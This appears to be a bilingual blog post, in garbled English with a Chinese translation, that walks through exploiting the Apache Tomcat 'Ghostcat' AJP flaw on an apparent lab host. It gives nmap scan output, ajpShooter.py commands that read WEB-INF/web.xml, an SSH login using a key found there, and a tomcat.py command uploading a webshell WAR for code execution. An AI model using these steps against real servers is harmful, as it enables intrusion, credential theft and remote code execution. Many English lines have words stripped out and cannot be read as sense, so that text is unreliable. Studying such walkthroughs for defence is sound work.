ghostcat_狩猎和利用Apache Ghostcat
The is a file which came out in the first of this year while the world was up for a fight up the .
漏洞是一个文件包含漏洞,该漏洞于今年第一季度发布,而当时世界正为锁定与冠状病毒的斗争做准备。
It any to read files such as files , test files or any other files . In , if a any user to files, an can the file JSP code to the and then the file by the , in code . Well like the ’s of this bug has also been there since a long long time and has to be until the past. The of the short blog post is to , and this bug.
它允许任何攻击者读取文件,例如配置文件,测试文件或任何其他目录文件。 此外,如果受害网站允许任何用户上传文件,则攻击者可以将包含恶意JSP代码的文件上传到服务器,然后利用漏洞包含上传的文件,从而导致远程执行代码。 就像冠状病毒的病毒家族一样,这个幽灵猫漏洞也已经存在很长时间了,直到最近才被发现。 简短博客文章的上下文旨在理解,识别和利用这个臭名昭著的错误。
The idea of a has ports set up . There’s of the 8080 HTTP port. Then there is known port 8009 which runs the AJP ( JServ ) . It is a and for .
服务器的总体思路是设置了不同的端口。 当然,还有8080 HTTP Web服务端口。 然后还有另一个鲜为人知的端口8009,它运行AJP( JServ协议)服务。 它本质上是通过实现的服务,并允许执行不同的操作。
What is the AJP fuss all about…?
AJP大惊小怪的是什么?
Well, the AJP is a that for an in to the HTTP. It is to HTTP but at a level. Since it is , the level is far more than the HTTP . In short , AJP will be used due to:
好吧,AJP是一种二进制协议,与HTTP相比,它减少了应用程序服务器的开销。 它类似于HTTP,但处于二进制级别。 由于它是二进制的,因此机器级别的转换比HTTP解析要快得多。 简而言之,由于以下原因,将使用AJP连接器:
It being and by by . 它由默认实现和公开。 More in and load front end and . 反向代理中的更多持久性要求前端和后端应用程序服务器之间的性能和负载平衡。 ’s rich API level the to push for more i.e; HTTP(S) data is and can be with API calls(like ()). 丰富的API级别实现使开发人员倍受青睐,以推动更快的协议遍历。 HTTP(S)数据是无缝的,可以通过简单的API调用(例如规范的())进行检索。 AJP you to skip the and pass of the the proxy and the app . AJP允许您跳过其他解析,并在代理服务器和应用程序服务器之间传递请求标头的有效二进制解释。
Ways to the
检测漏洞的方法
You can use the tool by the that have the . (Link: )
您可以使用已发布发现的研究人员的在线检测工具。 (链接: https : ///en/ )
2. The way.
2.手动方式。
The way of it:
手动查找方法:
As in any test we do an Nmap scan to open ports.
一如往常,在任何手动渗透测试中,我们都会执行Nmap扫描以检测开放端口。
sh-3.2# nmap -sS -sV -T2 10.10.54.51Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:54 ISTNmap scan report for 10.10.54.51Host is up (0.19s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)53/tcp open tcpwrapped8009/tcp open ajp13 Apache Jserv (Protocol v1.3)8080/tcp open http Apache Tomcat 9.0.30Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel6.x, 7.x, 8.x, and 9.x are found to be to this issue.
发现 6.x,7.x,8.x和9.x版本容易受到此问题的攻击。
Once we find the ports in the above you can head to this page: and run the .
找到上面结果中突出显示的所需端口后,您可以转到以下漏洞利用页面: https : ////-CNVD-2020-10487 。 并运行 。
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF read[<] 302 302[<] Location: /index.txt/[<] Content-Length: 0We are able to . Now we can try to files from the WEB-INF such as web.xml
我们能够检索信息。 现在我们可以尝试从WEB-INF文件夹中检索某些常见文件,例如web.xml
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF/web.xml read
[<] 200 200[<] Accept-Ranges: bytes[<] ETag: W/"1261-1583902632000"[<] Last-Modified: Wed, 21 Apr 2020 04:57:12 GMT[<] Content-Type: application/xml[<] Content-Length: 1261Welcome to Tomcat We found a (ks)that as key which could be used to login to ECorp with a key via an SSH .
我们发现了一个字符串( ks ),该字符串作为密钥出现,可以用于通过SSH会话使用密钥登录到名为ECorp的系统。
sh-3.2# ssh ECorp@10.10.54.51The authenticity of host '10.10.54.51 (10.10.54.51)' can't be established.ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '10.10.54.51' (ECDSA) to the list of known hosts.ECorp@10.10.54.51's password:
Linux ubuntu 4.4.0-174-generic #204-Ubuntu SMP Wed Apr 29 06:41:01 UTC 2020 x86_64 x86_64 x86_64 GNU/LinuxThat’s it we can own the and from the user ECorp and can also look for root level if there are any in the .
就是这样,我们可以拥有系统并从用户ECorp检索信息,并且如果系统中有任何错误配置,还可以寻找根级别升级。
If the files as well which is in , then we can WAR files such as :
如果应用程序服务器也允许上传通常不常见的文件,那么我们可以上传WAR文件,例如:
$ python tomcat.py upload -u tomcat -p tomcat webshell.war and gain a code using this issue.
并使用此问题获得代码执行。
More on it here: ()
